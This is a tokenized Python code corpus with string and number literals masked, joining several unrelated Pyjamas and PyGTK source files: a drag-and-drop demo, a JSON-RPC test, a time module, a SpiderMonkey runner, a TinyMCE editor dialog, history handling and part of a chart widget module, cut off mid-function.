Image ( ) <EOL> image . set_from_pixmap ( pixmap , mask ) <EOL> button = gtk . Button ( ) <EOL> button . add ( image ) <EOL> button . connect ( "<STR_LIT>" , self . sendCallback ) <EOL> button . drag_source_set ( gtk . gdk . BUTTON1_MASK , self . fromImage , <EOL> gtk . gdk . ACTION_COPY ) <EOL> button . show_all ( ) <EOL> self . layout . put ( button , int ( xd + hadj . value ) , int ( yd + vadj . value ) ) <EOL> return <EOL> def sendCallback ( self , widget , context , selection , targetType , eventTime ) : <EOL> if targetType == self . TARGET_TYPE_TEXT : <EOL> now = time . 
time ( ) <EOL> str = time . ctime ( now ) <EOL> selection . set ( selection . target , <NUM_LIT:8> , str ) <EOL> elif targetType == self . TARGET_TYPE_PIXMAP : <EOL> selection . set ( selection . target , <NUM_LIT:8> , <EOL> string . join ( gtkxpm . gtk_xpm , '<STR_LIT:\n>' ) ) <EOL> def receiveCallback ( self , widget , context , x , y , selection , targetType , <EOL> time ) : <EOL> if targetType == self . TARGET_TYPE_TEXT : <EOL> label = widget . get_children ( ) [ <NUM_LIT:0> ] <EOL> label . set_text ( selection . data ) <EOL> elif targetType == self . TARGET_TYPE_PIXMAP : <EOL> self . addImage ( string . split ( selection . data , '<STR_LIT:\n>' ) , x , y ) <EOL> def __init__ ( self ) : <EOL> self . window = gtk . Window ( gtk . WINDOW_TOPLEVEL ) <EOL> self . window . set_default_size ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . window . connect ( "<STR_LIT>" , lambda w : gtk . main_quit ( ) ) <EOL> self . window . show ( ) <EOL> layout = self . makeLayout ( ) <EOL> self . window . add ( layout ) <EOL> def main ( ) : <EOL> gtk . main ( ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> DragNDropExample ( ) <EOL> main ( ) </s>
<s> import unittest <EOL> import jsonrpclib <EOL> class TestJsolait ( unittest . TestCase ) : <EOL> def test_echo ( self ) : <EOL> s = jsonrpclib . ServerProxy ( "<STR_LIT>" , verbose = <NUM_LIT:0> ) <EOL> reply = s . echo ( "<STR_LIT>" ) <EOL> print reply <EOL> self . assert_ ( reply [ "<STR_LIT:result>" ] == "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> from __pyjamas__ import JS , debugger <EOL> import math <EOL> timezone = JS ( "<STR_LIT>" ) <EOL> altzone = JS ( "<STR_LIT>" ) <EOL> if altzone > timezone : <EOL> d = timezone <EOL> timezone = altzone <EOL> altzone = d <EOL> _dst = timezone - altzone <EOL> d = JS ( "<STR_LIT>" ) <EOL> d = str ( d . toLocaleString ( ) ) . split ( ) [ - <NUM_LIT:1> ] <EOL> if d [ <NUM_LIT:0> ] == '<STR_LIT:(>' : <EOL> d = d [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> tzname = ( d , None ) <EOL> del d <EOL> __c__days = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> __c__months = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> def time ( ) : <EOL> return float ( JS ( "<STR_LIT>" ) ) <EOL> class struct_time ( object ) : <EOL> n_fields = <NUM_LIT:9> <EOL> n_sequence_fields = <NUM_LIT:9> <EOL> n_unnamed_fields = <NUM_LIT:0> <EOL> tm_year = None <EOL> tm_mon = None <EOL> tm_mday = None <EOL> tm_hour = None <EOL> tm_min = None <EOL> tm_sec = None <EOL> tm_wday = None <EOL> tm_yday = None <EOL> tm_isdst = None <EOL> def __init__ ( self , ttuple = None ) : <EOL> if not ttuple is None : <EOL> self . tm_year = ttuple [ <NUM_LIT:0> ] <EOL> self . tm_mon = ttuple [ <NUM_LIT:1> ] <EOL> self . tm_mday = ttuple [ <NUM_LIT:2> ] <EOL> self . tm_hour = ttuple [ <NUM_LIT:3> ] <EOL> self . tm_min = ttuple [ <NUM_LIT:4> ] <EOL> self . tm_sec = ttuple [ <NUM_LIT:5> ] <EOL> self . tm_wday = ttuple [ <NUM_LIT:6> ] <EOL> self . tm_yday = ttuple [ <NUM_LIT:7> ] <EOL> self . tm_isdst = ttuple [ <NUM_LIT:8> ] <EOL> def __str__ ( self ) : <EOL> t = ( <EOL> self . tm_year , <EOL> self . tm_mon , <EOL> self . tm_mday , <EOL> self . tm_hour , <EOL> self . tm_min , <EOL> self . tm_sec , <EOL> self . tm_wday , <EOL> self . tm_yday , <EOL> self . tm_isdst , <EOL> ) <EOL> return t . 
__str__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . __str__ ( ) <EOL> def __getitem__ ( self , idx ) : <EOL> return [ self . tm_year , self . tm_mon , self . tm_mday , <EOL> self . tm_hour , self . tm_min , self . tm_sec , <EOL> self . tm_wday , self . tm_yday , self . tm_isdst ] [ idx ] <EOL> def __getslice__ ( self , lower , upper ) : <EOL> return [ self . tm_year , self . tm_mon , self . tm_mday , <EOL> self . tm_hour , self . tm_min , self . tm_sec , <EOL> self . tm_wday , self . tm_yday , self . tm_isdst ] [ lower : upper ] <EOL> def gmtime ( t = None ) : <EOL> if t is None : <EOL> t = time ( ) <EOL> date = JS ( "<STR_LIT>" ) <EOL> tm = struct_time ( ) <EOL> tm_year = tm . tm_year = int ( date . getUTCFullYear ( ) ) <EOL> tm . tm_mon = int ( date . getUTCMonth ( ) ) + <NUM_LIT:1> <EOL> tm . tm_mday = int ( date . getUTCDate ( ) ) <EOL> tm . tm_hour = int ( date . getUTCHours ( ) ) <EOL> tm . tm_min = int ( date . getUTCMinutes ( ) ) <EOL> tm . tm_sec = int ( date . getUTCSeconds ( ) ) <EOL> tm . tm_wday = ( int ( date . getUTCDay ( ) ) + <NUM_LIT:6> ) % <NUM_LIT:7> <EOL> tm . tm_isdst = <NUM_LIT:0> <EOL> startOfYear = JS ( "<STR_LIT>" ) <EOL> tm . tm_yday = <NUM_LIT:1> + int ( ( t - startOfYear . getTime ( ) / <NUM_LIT:1000> ) / <NUM_LIT> ) <EOL> return tm <EOL> def localtime ( t = None ) : <EOL> if t is None : <EOL> t = time ( ) <EOL> date = JS ( "<STR_LIT>" ) <EOL> dateOffset = date . getTimezoneOffset ( ) <EOL> tm = struct_time ( ) <EOL> tm_year = tm . tm_year = int ( date . getFullYear ( ) ) <EOL> tm_mon = tm . tm_mon = int ( date . getMonth ( ) ) + <NUM_LIT:1> <EOL> tm_mday = tm . tm_mday = int ( date . getDate ( ) ) <EOL> tm . tm_hour = int ( date . getHours ( ) ) <EOL> tm . tm_min = int ( date . getMinutes ( ) ) <EOL> tm . tm_sec = int ( date . getSeconds ( ) ) <EOL> tm . tm_wday = ( int ( date . getDay ( ) ) + <NUM_LIT:6> ) % <NUM_LIT:7> <EOL> tm . tm_isdst = <NUM_LIT:0> if timezone == <NUM_LIT> * date . 
getTimezoneOffset ( ) else <NUM_LIT:1> <EOL> startOfYear = JS ( "<STR_LIT>" ) <EOL> startOfYearOffset = startOfYear . getTimezoneOffset ( ) <EOL> startOfDay = JS ( "<STR_LIT>" ) <EOL> dt = float ( startOfDay . getTime ( ) - startOfYear . getTime ( ) ) / <NUM_LIT:1000> <EOL> dt = dt + <NUM_LIT> * ( startOfYearOffset - dateOffset ) <EOL> tm . tm_yday = <NUM_LIT:1> + int ( dt / <NUM_LIT> ) <EOL> return tm <EOL> def mktime ( t ) : <EOL> """<STR_LIT>""" <EOL> tm_year = t [ <NUM_LIT:0> ] <EOL> tm_mon = t [ <NUM_LIT:1> ] - <NUM_LIT:1> <EOL> tm_mday = t [ <NUM_LIT:2> ] <EOL> tm_hour = t [ <NUM_LIT:3> ] <EOL> tm_min = t [ <NUM_LIT:4> ] <EOL> tm_sec = t [ <NUM_LIT:5> ] <EOL> date = JS ( "<STR_LIT>" ) <EOL> utc = JS ( "<STR_LIT>" ) / <NUM_LIT:1000> <EOL> ts = date . getTime ( ) / <NUM_LIT:1000> <EOL> if t [ <NUM_LIT:8> ] == <NUM_LIT:0> : <EOL> if ts - utc == timezone : <EOL> return ts <EOL> return ts + _dst <EOL> return ts <EOL> def strftime ( fmt , t = None ) : <EOL> if t is None : <EOL> t = localtime ( ) <EOL> else : <EOL> if not isinstance ( t , struct_time ) and len ( t ) != <NUM_LIT:9> : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> tm_year = t [ <NUM_LIT:0> ] <EOL> tm_mon = t [ <NUM_LIT:1> ] <EOL> tm_mday = t [ <NUM_LIT:2> ] <EOL> tm_hour = t [ <NUM_LIT:3> ] <EOL> tm_min = t [ <NUM_LIT:4> ] <EOL> tm_sec = t [ <NUM_LIT:5> ] <EOL> tm_wday = t [ <NUM_LIT:6> ] <EOL> tm_yday = t [ <NUM_LIT:7> ] <EOL> date = JS ( "<STR_LIT>" ) <EOL> startOfYear = JS ( "<STR_LIT>" ) <EOL> firstMonday = <NUM_LIT:1> - ( ( startOfYear . getDay ( ) + <NUM_LIT:6> ) % <NUM_LIT:7> ) + <NUM_LIT:7> <EOL> firstWeek = JS ( "<STR_LIT>" ) <EOL> weekNo = date . getTime ( ) - firstWeek . 
getTime ( ) <EOL> if weekNo < <NUM_LIT:0> : <EOL> weekNo = <NUM_LIT:0> <EOL> else : <EOL> weekNo = <NUM_LIT:1> + int ( weekNo / <NUM_LIT> ) <EOL> def format ( c ) : <EOL> if c == '<STR_LIT:%>' : <EOL> return '<STR_LIT:%>' <EOL> elif c == '<STR_LIT:a>' : <EOL> return format ( '<STR_LIT:A>' ) [ : <NUM_LIT:3> ] <EOL> elif c == '<STR_LIT:A>' : <EOL> return __c__days [ format ( '<STR_LIT:w>' ) ] <EOL> elif c == '<STR_LIT:b>' : <EOL> return format ( '<STR_LIT:B>' ) [ : <NUM_LIT:3> ] <EOL> elif c == '<STR_LIT:B>' : <EOL> return __c__months [ tm_mon - <NUM_LIT:1> ] <EOL> elif c == '<STR_LIT:c>' : <EOL> return date . toLocaleString ( ) <EOL> elif c == '<STR_LIT:d>' : <EOL> return "<STR_LIT>" % tm_mday <EOL> elif c == '<STR_LIT:H>' : <EOL> return "<STR_LIT>" % tm_hour <EOL> elif c == '<STR_LIT:I>' : <EOL> return "<STR_LIT>" % ( tm_hour % <NUM_LIT:12> ) <EOL> elif c == '<STR_LIT>' : <EOL> return "<STR_LIT>" % tm_yday <EOL> elif c == '<STR_LIT:m>' : <EOL> return "<STR_LIT>" % tm_mon <EOL> elif c == '<STR_LIT:M>' : <EOL> return "<STR_LIT>" % tm_min <EOL> elif c == '<STR_LIT:p>' : <EOL> if tm_hour < <NUM_LIT:12> : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> elif c == '<STR_LIT:S>' : <EOL> return "<STR_LIT>" % tm_sec <EOL> elif c == '<STR_LIT>' : <EOL> raise NotImplementedError ( "<STR_LIT>" % c ) <EOL> elif c == '<STR_LIT:w>' : <EOL> return "<STR_LIT>" % ( ( tm_wday + <NUM_LIT:1> ) % <NUM_LIT:7> ) <EOL> elif c == '<STR_LIT>' : <EOL> return "<STR_LIT>" % weekNo <EOL> elif c == '<STR_LIT:x>' : <EOL> return "<STR_LIT:%s>" % date . toLocaleDateString ( ) <EOL> elif c == '<STR_LIT:X>' : <EOL> return "<STR_LIT:%s>" % date . 
toLocaleTimeString ( ) <EOL> elif c == '<STR_LIT:y>' : <EOL> return "<STR_LIT>" % ( tm_year % <NUM_LIT:100> ) <EOL> elif c == '<STR_LIT:Y>' : <EOL> return "<STR_LIT>" % tm_year <EOL> elif c == '<STR_LIT>' : <EOL> raise NotImplementedError ( "<STR_LIT>" % c ) <EOL> return "<STR_LIT:%>" + c <EOL> result = '<STR_LIT>' <EOL> remainder = fmt <EOL> re_pct = JS ( "<STR_LIT>" ) <EOL> JS ( "<STR_LIT>" ) <EOL> while remainder : <EOL> JS ( """<STR_LIT>""" ) <EOL> return str ( result ) <EOL> def asctime ( t = None ) : <EOL> if t is None : <EOL> t = localtime ( ) <EOL> return "<STR_LIT>" % ( __c__days [ ( t [ <NUM_LIT:6> ] + <NUM_LIT:1> ) % <NUM_LIT:7> ] [ : <NUM_LIT:3> ] , __c__months [ t [ <NUM_LIT:1> ] - <NUM_LIT:1> ] , t [ <NUM_LIT:2> ] , t [ <NUM_LIT:3> ] , t [ <NUM_LIT:4> ] , t [ <NUM_LIT:5> ] , t [ <NUM_LIT:0> ] ) <EOL> def ctime ( t = None ) : <EOL> return asctime ( localtime ( t ) ) <EOL> JS ( """<STR_LIT>""" ) <EOL> def _strptime ( datestring , format ) : <EOL> try : <EOL> return float ( JS ( "<STR_LIT>" ) ) <EOL> except : <EOL> raise ValueError ( "<STR_LIT>" % ( datestring , format ) ) <EOL> def strptime ( datestring , format ) : <EOL> try : <EOL> tt = localtime ( float ( JS ( "<STR_LIT>" ) ) ) <EOL> tt . tm_isdst = - <NUM_LIT:1> <EOL> return tt <EOL> except : <EOL> raise ValueError ( "<STR_LIT>" % ( datestring , format ) ) </s>
<s> import spidermonkey <EOL> import sys <EOL> from os . path import join , dirname , basename , abspath <EOL> from optparse import OptionParser <EOL> usage = """<STR_LIT>""" <EOL> currentdir = abspath ( dirname ( dirname ( __file__ ) ) ) <EOL> builddir = abspath ( "<STR_LIT:..>" ) <EOL> sys . path . append ( join ( builddir , "<STR_LIT>" ) ) <EOL> import pyjs <EOL> file_name = None <EOL> app_library_dirs = [ <EOL> currentdir , <EOL> join ( builddir , "<STR_LIT>" ) , <EOL> join ( builddir , "<STR_LIT>" ) , <EOL> join ( builddir , "<STR_LIT>" ) ] <EOL> cx = None <EOL> def pysm_print_fn ( arg ) : <EOL> print arg <EOL> def pysm_import_module ( parent_name , module_name ) : <EOL> if module_name == '<STR_LIT>' or module_name == '<STR_LIT>' : <EOL> return <EOL> if module_name == file_name : <EOL> return <EOL> exec "<STR_LIT>" % module_name <EOL> cx . add_global ( module_name , _module ) <EOL> def main ( ) : <EOL> global file_name <EOL> parser = OptionParser ( usage = usage ) <EOL> pyjs . add_compile_options ( parser ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> dest = "<STR_LIT:input>" , <EOL> help = "<STR_LIT>" ) <EOL> parser . set_defaults ( output = None , <EOL> input = None , <EOL> ) <EOL> ( options , args ) = parser . parse_args ( ) <EOL> file_name = args [ <NUM_LIT:0> ] <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> module_name = args [ <NUM_LIT:1> ] <EOL> else : <EOL> module_name = None <EOL> debug = <NUM_LIT:0> <EOL> if options . input : <EOL> txt = open ( options . input , '<STR_LIT:r>' ) . read ( ) <EOL> else : <EOL> parser = pyjs . PlatformParser ( "<STR_LIT>" , verbose = False ) <EOL> parser . setPlatform ( "<STR_LIT>" ) <EOL> if file_name . endswith ( "<STR_LIT>" ) : <EOL> file_name = file_name [ : - <NUM_LIT:3> ] <EOL> app_translator = pyjs . 
AppTranslator ( <EOL> app_library_dirs , parser , <EOL> verbose = False , <EOL> debug = options . debug , <EOL> print_statements = options . print_statements , <EOL> function_argument_checking = options . function_argument_checking , <EOL> attribute_checking = options . attribute_checking , <EOL> source_tracking = options . source_tracking , <EOL> line_tracking = options . line_tracking , <EOL> store_source = options . store_source , <EOL> ) <EOL> app_libs , txt = app_translator . translate ( file_name , debug = debug , <EOL> library_modules = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> template = """<STR_LIT>""" <EOL> txt = template % { '<STR_LIT>' : app_libs , '<STR_LIT>' : file_name , <EOL> '<STR_LIT>' : txt } <EOL> txt += "<STR_LIT>" <EOL> txt += "<STR_LIT>" <EOL> txt += "<STR_LIT>" % file_name <EOL> if options . output : <EOL> fp = open ( options . output , '<STR_LIT:w>' ) <EOL> fp . write ( txt ) <EOL> fp . close ( ) <EOL> rt = spidermonkey . Runtime ( ) <EOL> global cx <EOL> cx = rt . new_context ( ) <EOL> cx . add_global ( "<STR_LIT>" , pysm_print_fn ) <EOL> cx . add_global ( "<STR_LIT>" , pysm_import_module ) <EOL> cx . execute ( txt ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> from pyjamas . ui . TextArea import TextArea <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . Button import Button <EOL> from pyjamas . ui . DockPanel import DockPanel <EOL> from pyjamas . ui . DialogWindow import DialogWindow <EOL> from pyjamas . ui import HasAlignment <EOL> from pyjamas . ui . HorizontalPanel import HorizontalPanel <EOL> from pyjamas import DeferredCommand <EOL> from pyjamas . Timer import Timer <EOL> from pyjamas import DOM <EOL> from __pyjamas__ import doc <EOL> _editor_id = <NUM_LIT:0> <EOL> class EditDialogWindow ( DialogWindow ) : <EOL> def __init__ ( self , app ) : <EOL> self . app = app <EOL> DialogWindow . __init__ ( <EOL> self , modal = False , <EOL> minimize = True , maximize = True , close = True , <EOL> ) <EOL> self . closeButton = Button ( "<STR_LIT>" , self ) <EOL> self . saveButton = Button ( "<STR_LIT>" , self ) <EOL> self . setText ( "<STR_LIT>" ) <EOL> self . msg = HTML ( "<STR_LIT>" , True ) <EOL> global _editor_id <EOL> _editor_id += <NUM_LIT:1> <EOL> editor_id = "<STR_LIT>" % _editor_id <EOL> self . txt = TextArea ( Text = "<STR_LIT>" , VisibleLines = <NUM_LIT:30> , CharacterWidth = <NUM_LIT> , <EOL> ID = editor_id ) <EOL> dock = DockPanel ( ) <EOL> dock . setSpacing ( <NUM_LIT:4> ) <EOL> hp = HorizontalPanel ( Spacing = "<STR_LIT:5>" ) <EOL> hp . add ( self . saveButton ) <EOL> hp . add ( self . closeButton ) <EOL> dock . add ( hp , DockPanel . SOUTH ) <EOL> dock . add ( self . msg , DockPanel . NORTH ) <EOL> dock . add ( self . txt , DockPanel . CENTER ) <EOL> dock . setCellHorizontalAlignment ( hp , HasAlignment . ALIGN_RIGHT ) <EOL> dock . setCellWidth ( self . txt , "<STR_LIT>" ) <EOL> dock . setWidth ( "<STR_LIT>" ) <EOL> self . setWidget ( dock ) <EOL> self . editor_id = editor_id <EOL> self . editor_created = False <EOL> def add_tinymce ( self ) : <EOL> iframe = DOM . createElement ( "<STR_LIT>" ) <EOL> DOM . setElemAttribute ( iframe , "<STR_LIT:id>" , "<STR_LIT>" % self . 
editor_id ) <EOL> DOM . setElemAttribute ( iframe , "<STR_LIT>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( iframe ) <EOL> new_script = DOM . createElement ( "<STR_LIT>" ) <EOL> new_script . innerHTML = """<STR_LIT>""" <EOL> ih = """<STR_LIT>""" % self . editor_id <EOL> print new_script . innerHTML <EOL> DOM . setElemAttribute ( new_script , "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( new_script ) <EOL> def load ( self , token , fname , data ) : <EOL> left = <NUM_LIT:50> <EOL> top = <NUM_LIT:50> <EOL> self . setPopupPosition ( left , top ) <EOL> self . show ( ) <EOL> self . token = token <EOL> self . fname = fname <EOL> self . msg . setHTML ( "<STR_LIT>" % fname ) <EOL> self . txt . setText ( data ) <EOL> if not self . editor_created : <EOL> self . editor_created = True <EOL> if self . fname . endswith ( "<STR_LIT>" ) : <EOL> Timer ( <NUM_LIT> , notify = self . _load_tinymce ) <EOL> def _load_tinymce ( self , timer ) : <EOL> self . add_tinymce ( ) <EOL> def load_tinymce ( self ) : <EOL> new_script = DOM . createElement ( "<STR_LIT>" ) <EOL> new_script . innerHTML = """<STR_LIT>""" % self . editor_id <EOL> print new_script . innerHTML <EOL> DOM . setElemAttribute ( new_script , "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( new_script ) <EOL> def transfer_tinymce ( self ) : <EOL> new_script = DOM . createElement ( "<STR_LIT>" ) <EOL> new_script . innerHTML = """<STR_LIT>""" % ( self . editor_id , self . editor_id ) <EOL> self . editor_created = False <EOL> DOM . setElemAttribute ( new_script , "<STR_LIT:type>" , "<STR_LIT>" ) <EOL> doc ( ) . body . appendChild ( new_script ) <EOL> self . hide ( ) <EOL> t = Timer ( notify = self ) <EOL> t . scheduleRepeating ( <NUM_LIT:1000> ) <EOL> def onTimer ( self , timer ) : <EOL> iframe = doc ( ) . getElementById ( "<STR_LIT>" % self . editor_id ) <EOL> print dir ( iframe ) <EOL> txt = iframe . innerText <EOL> if not txt : <EOL> return <EOL> timer . 
cancel ( ) <EOL> doc ( ) . body . removeChild ( iframe ) <EOL> self . app . save_page ( self . token , self . fname , txt ) <EOL> def onClick ( self , sender ) : <EOL> if sender == self . saveButton : <EOL> if self . fname . endswith ( "<STR_LIT>" ) : <EOL> self . transfer_tinymce ( ) <EOL> else : <EOL> txt = self . txt . getText ( ) <EOL> self . app . save_page ( self . token , self . fname , txt ) <EOL> self . hide ( ) <EOL> else : <EOL> self . hide ( ) </s>
<s> """<STR_LIT>""" <EOL> from pyjamas . Canvas . CanvasGradientImplDefault import CanvasGradientImplDefault <EOL> """<STR_LIT>""" <EOL> class RadialGradientImplDefault ( CanvasGradientImplDefault ) : <EOL> def __init__ ( self , x0 , y0 , r0 , x1 , y1 , r1 , c ) : <EOL> CanvasGradientImplDefault . __init__ ( self ) <EOL> self . createNativeGradientObject ( x0 , y0 , r0 , x1 , y1 , r1 , c ) <EOL> def createNativeGradientObject ( self , x0 , y0 , r0 , x1 , y1 , r1 , c ) : <EOL> ctx = c . getContext ( '<STR_LIT>' ) <EOL> gradient = ctx . createRadialGradient ( x0 , y0 , r0 , x1 , y1 , r1 ) <EOL> self . setNativeGradient ( gradient ) </s>
<s> from __pyjamas__ import JS , doc , wnd <EOL> import pyjd <EOL> if pyjd . is_desktop : <EOL> from __pyjamas__ import get_main_frame <EOL> global historyToken <EOL> historyToken = '<STR_LIT>' <EOL> historyListeners = [ ] <EOL> """<STR_LIT>""" <EOL> def addHistoryListener ( listener ) : <EOL> print "<STR_LIT>" , listener <EOL> historyListeners . append ( listener ) <EOL> def back ( ) : <EOL> wnd ( ) . history . back ( ) <EOL> def forward ( ) : <EOL> wnd ( ) . history . forward ( ) <EOL> def getToken ( ) : <EOL> global historyToken <EOL> return historyToken <EOL> def newItem ( ht ) : <EOL> global historyToken <EOL> if historyToken == ht : <EOL> return <EOL> onHistoryChanged ( ht ) <EOL> return <EOL> JS ( """<STR_LIT>""" ) <EOL> def onHistoryChanged ( ht ) : <EOL> fireHistoryChangedImpl ( ht ) <EOL> def fireHistoryChangedAndCatch ( ) : <EOL> pass <EOL> def fireHistoryChangedImpl ( ht ) : <EOL> global historyToken <EOL> if historyToken == ht : <EOL> return <EOL> historyToken = ht <EOL> for listener in historyListeners : <EOL> listener . onHistoryChanged ( ht ) <EOL> def removeHistoryListener ( listener ) : <EOL> historyListeners . remove ( listener ) <EOL> def _first_notify ( ) : <EOL> print "<STR_LIT>" , historyToken <EOL> onHistoryChanged ( historyToken ) <EOL> def init ( ) : <EOL> print "<STR_LIT>" , get_main_frame ( ) , pyjd . is_desktop <EOL> if get_main_frame ( ) is None : <EOL> if pyjd . is_desktop : <EOL> pyjd . add_setup_callback ( init ) <EOL> return <EOL> global historyToken <EOL> historyToken = '<STR_LIT>' <EOL> hash = wnd ( ) . location . hash <EOL> if hash and len ( hash ) > <NUM_LIT:0> : <EOL> historyToken = hash [ <NUM_LIT:1> : ] <EOL> init ( ) </s>
<s> """<STR_LIT>""" <EOL> import math <EOL> from pyjamas import DOM <EOL> from pyjamas import Window <EOL> from pyjamas . ui import Event <EOL> from pyjamas . ui . AbsolutePanel import AbsolutePanel <EOL> from pyjamas . ui . Composite import Composite <EOL> from pyjamas . ui . Grid import Grid <EOL> from pyjamas . ui import HasHorizontalAlignment <EOL> from pyjamas . ui import HasVerticalAlignment <EOL> from pyjamas . ui . HTML import HTML <EOL> from pyjamas . ui . Image import Image <EOL> from pyjamas . ui . SimplePanel import SimplePanel <EOL> from pyjamas . ui . UIObject import UIObject <EOL> from pyjamas . ui . Widget import Widget <EOL> from pyjamas . chart . GChartConsts import N_PRE_SYSTEM_CURVES <EOL> from pyjamas . chart . GChartConsts import TRANSPARENT_BORDER_COLOR <EOL> from pyjamas . chart . GChartConsts import HOVER_ANNOTATION_ID <EOL> from pyjamas . chart . GChartConsts import HOVER_CURSOR_ID <EOL> from pyjamas . chart . GChartConsts import USE_CSS <EOL> from pyjamas . chart . GChartConsts import NAI <EOL> from pyjamas . chart . GChartConsts import DEFAULT_BLANK_IMAGE_URL_FULLPATH <EOL> from pyjamas . chart import GChartUtil <EOL> from pyjamas . chart import Double <EOL> """<STR_LIT>""" <EOL> WIDGETS_PER_PANEL = <NUM_LIT> <EOL> class PartitionedAbsolutePanel ( Composite ) : <EOL> """<STR_LIT>""" <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwargs ) : <EOL> self . root = AbsolutePanel ( ) <EOL> self . subPanel = None <EOL> self . iSubPanel = - <NUM_LIT:1> <EOL> self . nWidgets = <NUM_LIT:0> ; <EOL> Composite . __init__ ( self , ** kwargs ) <EOL> self . initWidget ( self . root ) <EOL> """<STR_LIT>""" <EOL> def clear ( self ) : <EOL> self . root . clear ( ) <EOL> self . subPanel = None <EOL> self . iSubPanel = - <NUM_LIT:1> <EOL> self . nWidgets = <NUM_LIT:0> <EOL> def getWidgetCount ( self ) : <EOL> return self . nWidgets <EOL> def selectSubPanel ( self , iWidget ) : <EOL> if self . 
iSubPanel != int ( iWidget / WIDGETS_PER_PANEL ) : <EOL> self . iSubPanel = int ( iWidget / WIDGETS_PER_PANEL ) <EOL> self . subPanel = self . root . getWidget ( self . iSubPanel ) <EOL> def add ( self , w ) : <EOL> if ( self . nWidgets % WIDGETS_PER_PANEL ) == <NUM_LIT:0> : <EOL> self . subPanel = AbsolutePanel ( ) <EOL> GChartUtil . setOverflow ( self . subPanel , "<STR_LIT>" ) <EOL> self . subPanel . setPixelSize ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . root . add ( self . subPanel , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . selectSubPanel ( self . nWidgets ) <EOL> self . subPanel . add ( w ) <EOL> self . nWidgets += <NUM_LIT:1> <EOL> def getWidget ( self , iWidget ) : <EOL> if iWidget < <NUM_LIT:0> or iWidget >= self . nWidgets : <EOL> raise IndexError ( <EOL> "<STR_LIT>" + str ( iWidget ) + <EOL> "<STR_LIT>" + str ( ( self . nWidgets - <NUM_LIT:1> ) ) ) <EOL> self . selectSubPanel ( iWidget ) <EOL> result = self . subPanel . getWidget ( iWidget % WIDGETS_PER_PANEL ) <EOL> return result <EOL> def remove ( self , iWidget ) : <EOL> if iWidget != self . nWidgets - <NUM_LIT:1> : <EOL> raise IllegalArgumentException ( <EOL> "<STR_LIT>" + iWidget + "<STR_LIT>" + ( self . nWidgets - <NUM_LIT:1> ) + "<STR_LIT>" ) <EOL> self . selectSubPanel ( iWidget ) <EOL> result = self . subPanel . remove ( iWidget % WIDGETS_PER_PANEL ) <EOL> if ( iWidget % WIDGETS_PER_PANEL ) == <NUM_LIT:0> : <EOL> self . root . remove ( self . subPanel ) <EOL> self . iSubPanel = - <NUM_LIT:1> <EOL> self . subPanel = None <EOL> self . nWidgets -= <NUM_LIT:1> <EOL> return result <EOL> def setWidgetPosition ( self , w , left , top ) : <EOL> self . subPanel . setWidgetPosition ( w , left , top ) <EOL> class AlignedLabel ( Grid ) : <EOL> def __init__ ( self , ** kwargs ) : <EOL> Grid . __init__ ( self , <NUM_LIT:1> , <NUM_LIT:1> , ** kwargs ) <EOL> self . getCellFormatter ( ) . setWordWrap ( <NUM_LIT:0> , <NUM_LIT:0> , False ) <EOL> self . setCellPadding ( <NUM_LIT:0> ) <EOL> self . 
setCellSpacing ( <NUM_LIT:0> ) <EOL> self . setBorderWidth ( <NUM_LIT:0> ) <EOL> class Rectangle ( object ) : <EOL> def __str__ ( self ) : <EOL> return "<STR_LIT>" % ( self . x , self . y , self . width , self . height ) <EOL> """<STR_LIT>""" <EOL> class NonoccludingReusuableAlignedLabel ( AlignedLabel ) : <EOL> def getInnerGrid ( self ) : <EOL> return self . innerGrid <EOL> def __init__ ( self ) : <EOL> self . fontSize = NAI <EOL> self . fontStyle = USE_CSS <EOL> self . fontWeight = USE_CSS <EOL> self . fontColor = USE_CSS <EOL> self . labelText = None <EOL> self . isHTML = False <EOL> self . labelWidget = None <EOL> self . innerGrid = AlignedLabel ( ) <EOL> self . hAlign = None <EOL> self . vAlign = None <EOL> AlignedLabel . __init__ ( self ) <EOL> self . setWidget ( <NUM_LIT:0> , <NUM_LIT:0> , self . innerGrid ) <EOL> """<STR_LIT>""" <EOL> DOM . setStyleAttribute ( self . getElement ( ) , "<STR_LIT>" , "<STR_LIT>" ) <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , <EOL> "<STR_LIT>" , "<STR_LIT>" ) <EOL> """<STR_LIT>""" <EOL> def setReusableProperties ( self , fontSize , fontStyle , fontWeight , fontColor , <EOL> hAlign , vAlign , labelText , <EOL> isHTML , labelWidget ) : <EOL> if self . fontSize != fontSize : <EOL> DOM . setIntStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontSize ) <EOL> self . fontSize = fontSize <EOL> if self . fontStyle != fontStyle : <EOL> DOM . setStyleAttribute ( self . innerGrid . getElement ( ) , "<STR_LIT>" , fontStyle ) <EOL> self . fontStyle = fontStyle <EOL> if self . fontWeight != fontWeight : <EOL> 